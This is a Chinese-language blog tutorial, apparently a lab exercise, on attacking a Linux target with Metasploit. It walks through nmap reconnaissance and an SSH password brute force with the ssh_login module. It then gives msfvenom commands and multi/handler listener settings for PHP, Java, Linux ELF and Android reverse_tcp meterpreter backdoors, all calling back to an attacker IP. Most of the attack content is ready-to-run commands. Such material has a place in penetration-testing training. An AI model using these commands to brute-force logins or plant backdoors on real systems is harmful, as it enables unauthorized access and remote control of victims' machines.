zoukankan      html  css  js  c++  java
  • Metasploit后门渗透Linux系统以及跨平台后门生成

    Metasploit后门渗透Linux系统以及跨平台后门生成

    TOC

    1.Metasploit对目标主机SSH爆破

    1.实验原理:靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务

    1.1爆破过程

    1.验证局域网内部存活主机:nmap -sP 192.168.73.0/24;得到靶机IP

    2.扫描靶机的操作系统:nmap -O 192.168.73.128;得到靶机的操作系统及版本号

    3.扫描靶机的端口开放及应用程序的版本号:nmap -sV -Pn 192.168.73.128;发现22端口开放,其应用程序为ssh

    4.打开Metasploit工具,利用msf ssh_login模块暴力破解靶机ssh密码:use auxiliary/scanner/ssh/ssh_login;进入模块show options配置

    5.建立用户名字典及密码字典(为了减少爆破时间,用户名及密码设置特定的几个即可)

    • user.txtpass.txt文件放到kali linux指定目录下

    6.准备进行ssh爆破:设置用户名字典和密码字典的路径;设置靶机的IP地址;设置线程为50;开始执行

    • exploit之后,没有显示;将VERBOSE设置为true即可

    7.等待ssh爆破执行完毕

    8.开始链接

    2.PHP后门生成

    1.示例指令:

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php
    

    • LHOST:攻击者IP
    • PHP后门代码

    2.配置Metasploitexploit监听

    search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
    use exploit/multi/handler        // 使用模块
    show options         // 配置
    set LHOST 192.168.73.131
    set payload php/meterpreter/reverse_tcp         // 设置测试的载荷
    exploit            // 监听
    

    • php后门使用

    3.JAVA后门生成

    1.示例指令

    msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar
    

    2.配置Metasploitexploit监听

    search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
    use exploit/multi/handler        // 使用模块
    show options         // 配置
    set LHOST 192.168.73.131
    set payload java/meterpreter/reverse_tcp         // 设置测试的载荷
    exploit            // 监听
    

    • java后门使用

    4.LINUX后门生成

    1.示例指令:

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell
    

    2.配置Metasploitexploit监听

    search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
    use exploit/multi/handler        // 使用模块
    show options         // 配置
    set LHOST 192.168.73.131
    set payload linux/x86/meterpreter/reverse_tcp         // 设置测试的载荷
    exploit            // 监听
    

    • linux后门使用

    5.Android后门生成

    1.示例指令:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=5555 R > /root/Linux/backdoor.apk
    

    2.配置Metasploitexploit监听

    search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
    use exploit/multi/handler        // 使用模块
    show options         // 配置
    set LHOST 192.168.73.131
    set LPORT 5555
    set payload android/meterpreter/reverse_tcp         // 设置测试的载荷
    exploit            // 监听
    

    ☛参考文档

    ☛2019-08-28 14:27:50 星期三





  • 相关阅读:
    使用bink播放视频
    Vertex Shader And Pixel Shader
    Points Versus Pixels in Cocos2D
    ogre_机器人在10个位置循环走动
    简单播放声音PlaySound
    Vertex Shader 入门代码
    加载地形的类
    Animation Cache in Cocos2diphone v2.0.0
    [转]Rad Video Tools使用手册
    CSound类源文件
  • 原文地址:https://www.cnblogs.com/Get-Me/p/11423924.html
Copyright © 2011-2022 走看看